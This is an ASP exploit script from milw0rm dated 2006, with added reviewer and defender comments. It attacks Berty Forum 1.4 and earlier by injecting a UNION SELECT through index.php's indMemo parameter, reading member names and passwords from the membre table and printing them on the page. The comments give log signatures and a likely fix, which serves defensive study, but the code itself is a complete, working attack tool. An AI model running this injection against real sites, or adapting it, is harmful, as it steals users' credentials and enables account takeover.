<%
' Buffer the whole response. The page calls Response.Redirect further down,
' after page text has already been emitted; buffering is presumably enabled for that.
Response.Buffer = True
%>
<%
' Runtime errors are suppressed for the rest of the script, so a failed HTTP
' request or a missing marker yields empty or arbitrary output instead of an error page.
On Error Resume Next
%>
<%
' Script timeout in seconds.
Server.ScriptTimeout = 100
%>
<%
'===============================================================================================
'[Script Name: Berty Forum <= 1.4(index.php) Remote Blind SQL Injection Exploit
'[Coded by   : ajann
'[Author     : ajann
'[Contact    : :(
'[ExploitName: exploit1.asp
'[Greetz To: ## A blessed Ramadan Feast to the whole Muslim world; God willing we will see another ##
'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'===============================================================================================
' NOTE(review): despite "Blind" in the title, the requests built below use a
' UNION SELECT and read the value straight out of the response body.
' Affected component as stated by the author: Berty Forum <= 1.4, index.php.
%>
Berty Forum v1.4(index.php) Blind SQL Injection Exploit
Berty Forum <=v1.4(index.php) Blind SQL Injection Exploit

TARGET:Example:[http://x.com/path]

USER ID:Example:[User ID=1]


<%
' Status banner. islem ("action") is read from the query string; the values
' hata1..hata3 ("error") are the ones the validation redirects below send back
' to this same page (exploit1.asp).
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "There is a problem! Please complete to the whole spaces"
End If
If islem = "hata2" Then
Response.Write "There is a problem! Please right character use"
End If
If islem = "hata3" Then
Response.Write "There is a problem! Add ""http://"""
End If
%>
<%
' islem = "get": build two request URLs from the submitted form and fetch them.
'
' Defender notes:
'  - Both URLs hit /index.php?consult=1 and put a UNION SELECT against the
'    membre table into the indMemo parameter. In web-server or WAF logs the
'    request is recognisable by "indMemo=-1", "union select" and "membre" in
'    the query string of index.php.
'  - Presumably indMemo reaches a SQL statement in index.php without numeric
'    validation or parameter binding; the PHP source is not shown on this
'    page -- confirm there. The usual fix is to cast the value to an integer
'    and use a bound parameter.
'  - The first URL selects the mdp column, the second the nom column; the row
'    is chosen by the "id" form field ("where ind like <id>").
If islem = "get" Then
string1="/index.php?consult=1&indMemo="
string2="-1%20union select%20"
string3="mdp%20"
string4="from%20"
string5="membre%20"
string6="where%20"
string7="ind like%20"
string8=Request.Form("id")
string9="/index.php?consult=1&indMemo="
string10="-1%20union select%20"
string11="nom%20"
string12="from%20"
string13="membre%20"
string14="where%20"
string15="ind like%20"
string16=Request.Form("id")
targettext = Request.Form("text1")
' arama / arama2 ("search"): position of "union" and of "http://" in the
' target field; the final argument 1 selects text (case-insensitive) comparison.
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
' Form validation: empty target -> hata1, target containing "union" -> hata2,
' target without "http://" -> hata3. Only the last Else branch issues requests.
If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")
Else
%>
<%
' Target base URL + fixed path/query + the submitted id.
target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8
target2 = targettext+string9+string10+string11+string12+string13+string14+string15+string16
' take(come): synchronous HTTP GET of the URL in come (third .Open argument is
' FALSE, i.e. not asynchronous) through the Microsoft.XMLHTTP COM object;
' returns the response body as text. .sEnd is .Send (VBScript is case-insensitive).
' Note that the request is made by the server hosting this page, to whatever
' URL the form supplied.
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function
' get_username holds the response to target1 (mdp query), get_password the
' response to target2 (nom query).
get_username = take(target1)
get_password = take(target2)
' Locate the HTML marker "720" valign="top"> in the first response. The marker
' is 19 characters long, so getdata+19 is the first character after it; 20
' characters are sliced from there. The offset found in the first response is
' reused for the second one. If the marker is absent InStr returns 0 and the
' slices start at a fixed position 19.
getdata=InStr(get_username,"""720"" valign=""top"">" )
username=Mid(get_username,getdata+19,20)
passwd=Mid(get_password,getdata+19,20)
' The two slices are written into the page below with <%= %> and no
' Server.HTMLEncode, so any markup in the remote response is rendered as-is.
%>
ajann
             User Name:  <%=username%>
             User Password:  <%=passwd%>

<%
' Close the three nested validation Ifs and the outer If islem = "get".
End If
End If
End If
End If
' objtake is also set to Nothing inside take().
Set objtake = Nothing
%>
# milw0rm.com [2006-10-24]